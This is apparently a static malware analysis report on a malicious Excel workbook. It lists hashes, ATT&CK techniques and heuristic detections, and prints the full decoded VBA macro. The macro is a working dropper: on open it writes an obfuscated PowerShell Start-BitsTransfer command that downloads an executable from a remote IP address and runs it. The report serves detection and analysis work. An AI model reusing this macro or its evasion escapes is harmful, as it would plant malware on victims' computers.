Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 122fd6ba7eaff699…

MALICIOUS

Office (OLE) / .XLS

168.0 KB Created: 2021-04-13 13:37:17 Authoring application: Microsoft Excel First seen: 2021-10-23
MD5: f1a0dc40b455647ef7fa4e9b9c009469 SHA-1: 42621f4cd2ad7f0de4140ac63845b8826e6e978c SHA-256: 122fd6ba7eaff6999bceced392b909939a14c82ef7a562d630772eaf33a6fbe9
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1105 Ingress Tool Transfer T1566.001 Spearphishing Attachment

The Workbook_Open VBA macro is designed to stage a PowerShell command that downloads an executable from 'http://3.64.251.139/v11/1/TDH_71036210065IMG.exe' and saves it as 'C:\Users\Public\Documents\minutesister.exe'. The script then executes the downloaded file. The GetObject call is used to execute the staged PowerShell command from 'C:\Users\Public\Documents\frontserve.cmd'. This indicates a downloader or droppper functionality.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Private Sub Workbook_Open()
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject("new:" & sheehe & "l.application").Open (andattack)
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1282 bytes
SHA-256: b3abc6692fe42688fbbf515efa69602b6d99534534a0c5a4be0688d6094565f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
kidus = "pow^ers"
yourcost = "he^ll"
studenttrip = FreeFile
andattack = "C:\Users\Public\Documents\frontserve.cm" & Chr(CLng(97.5) + CLng(1.6))
Open andattack For Output As #studenttrip
Print #studenttrip, kidus & yourcost & " -w hi slee^p -Se 31;Start-BitsTrans^fer -Source htt`p://3.64.251.139/v11/1/TDH_71036210065IMG.e`xe" & " -Destination C:\Users\Public\Documents\minutesister.e`xe" & ";C:\Users\Public\Documents\minutesister.e`xe"
Close studenttrip
sheehe = "shel"
GetObject("new:" & sheehe & "l.application").Open (andattack)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub starbed()
'
' starbed Macro
' 1Y9EPHD78LD1
'
End Sub